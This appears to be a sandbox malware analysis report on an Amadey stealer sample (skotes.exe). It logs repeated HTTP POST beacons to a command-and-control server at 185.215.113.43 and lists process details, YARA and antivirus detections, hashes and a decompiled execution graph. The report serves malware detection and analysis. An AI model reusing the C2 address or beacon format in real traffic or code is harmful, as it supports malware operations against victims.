                                Nov 20, 2024 13:08:28.748363972 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:28 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.449950185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:30.256681919 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:30.964792967 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:30 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.449966185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:32.602988958 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:33.301089048 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:33 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.449982185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:34.819969893 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:35.548026085 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:35 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.449998185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:37.243161917 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:37.965090036 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:37 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.450012185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:39.474896908 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:40.175301075 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:40 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.450018185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:41.816001892 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:42.518135071 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:42 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.450019185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:44.042555094 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:44.736030102 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:44 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.450020185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:46.369529009 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:47.083113909 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:46 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.450021185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:48.664452076 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:49.359998941 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:49 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.450022185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:50.991095066 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:51.709582090 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:51 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.450023185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:53.227421045 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:53.936414003 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:53 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.450024185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:55.570486069 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:56.270329952 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:56 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.450025185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:57.791459084 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:58.500287056 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:58 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.450026185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:09:00.150880098 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:09:00.852583885 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:09:00 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.450027185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:09:02.373483896 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:09:03.078866959 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:09:02 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.450028185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:09:04.813427925 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:09:05.532282114 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:09:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:07:07:00
                                Start date:20/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xf20000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1714685020.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:07:07:03
                                Start date:20/11/2024
                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Imagebase:0xe90000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1786704967.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1743788410.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 53%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:07:07:03
                                Start date:20/11/2024
                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Imagebase:0xe90000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1743754527.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1786941479.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:07:08:00
                                Start date:20/11/2024
                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Imagebase:0xe90000
                                File size:1'863'680 bytes
                                MD5 hash:EBE6DE9BE122D27057536193303F1F89
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2310587300.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Reset < >
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1761237578.0000000005460000.00000040.00001000.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebfcc511a1bee251bb6898f6fb2a2f0a119839607de76cb51d45e00c0b5bee10
                                  • Instruction ID: 26eb9dbec2b5760672f5178ed5066c7ddb511e65fcad0831c3dacf2d0a47f394
                                  • Opcode Fuzzy Hash: ebfcc511a1bee251bb6898f6fb2a2f0a119839607de76cb51d45e00c0b5bee10
                                  • Instruction Fuzzy Hash: 91D0C9AF21D125EE6145D5967A1C6F6AB2EE5C23713308E63F00BCA041C949594BA132
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1761237578.0000000005460000.00000040.00001000.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe137df07aeb80883ea9c9a585e696bf15213287650df14611c4200fa1a733ae
                                  • Instruction ID: b8d0ffd262cb06eeb9aae4d126ad8ab0ba060c6cac5cd03b4d312a814fe68677
                                  • Opcode Fuzzy Hash: fe137df07aeb80883ea9c9a585e696bf15213287650df14611c4200fa1a733ae
                                  • Instruction Fuzzy Hash: C41151EF248110BD615696956B6C6FAABBFE5C36303304967F40FC9602E6C54E4E6133
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1761237578.0000000005460000.00000040.00001000.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1ec8a2b0bb50bb6ef54bde897eda3cd4454629391baf52d1f74c309fecef954
                                  • Instruction ID: c67ad2efba4769f7296f233a6ed47f93963c3a624649ed7707639ef4c979533c
                                  • Opcode Fuzzy Hash: f1ec8a2b0bb50bb6ef54bde897eda3cd4454629391baf52d1f74c309fecef954
                                  • Instruction Fuzzy Hash: 84D012BF21D120EEA155D5927A5D6FAEB2EE5C23753308A33F00ACE141C54D5E4FA272

                                  Execution Graph

                                  Execution Coverage:5.8%
                                  Dynamic/Decrypted Code Coverage:0.6%
                                  Signature Coverage:10.9%
                                  Total number of Nodes:340
                                  Total number of Limit Nodes:6
                                  execution_graph 11968 eab8b9 11975 eab7b5 11968->11975 11970 eab906 11987 eab718 11970->11987 11971 eab8e1 Concurrency::details::_Reschedule_chore 11971->11970 11983 eacbae 11971->11983 11974 eab91e 11976 eab7c1 Concurrency::details::_Reschedule_chore 11975->11976 11977 eab7f2 11976->11977 11978 eac6ac GetSystemTimePreciseAsFileTime 11976->11978 11977->11971 11979 eab7d6 11978->11979 11997 e92b10 11979->11997 11981 eab7dc __Mtx_unlock 11982 e92b10 3 API calls 11981->11982 11982->11977 11984 eacbcc 11983->11984 11985 eacbbc TpCallbackUnloadDllOnCompletion 11983->11985 11984->11970 11985->11984 11988 eab724 Concurrency::details::_Reschedule_chore 11987->11988 11989 eab77e 11988->11989 11990 eac6ac GetSystemTimePreciseAsFileTime 11988->11990 11989->11974 11991 eab739 11990->11991 11992 e92b10 3 API calls 11991->11992 11993 eab73f __Mtx_unlock 11992->11993 11994 e92b10 3 API calls 11993->11994 11995 eab75c __Cnd_broadcast 11994->11995 11995->11989 11996 e92b10 3 API calls 11995->11996 11996->11989 11998 e92b1a 11997->11998 11999 e92b1c 11997->11999 11998->11981 12000 eac26a 3 API calls 11999->12000 12001 e92b22 ___std_exception_copy 12000->12001 12001->11981 12256 eab92e 12257 eab7b5 4 API calls 12256->12257 12258 eab956 12257->12258 12259 eab718 4 API calls 12258->12259 12260 eab96f 12259->12260 12094 ec6629 12095 ec64c7 2 API calls 12094->12095 12096 ec663a 12095->12096 11893 e9e0c0 recv 11894 e9e122 recv 11893->11894 11895 e9e157 recv 11894->11895 11897 e9e191 11895->11897 11896 e9e2b3 11897->11896 11902 eac6ac 11897->11902 11909 eac452 11902->11909 11904 e9e2ee 11905 eac26a 11904->11905 11906 eac292 11905->11906 11907 eac274 11905->11907 11906->11906 11907->11906 11926 eac297 11907->11926 11910 eac4a8 11909->11910 11912 eac47a 11909->11912 11910->11912 11915 eacf6b 11910->11915 11912->11904 11913 eac4fd 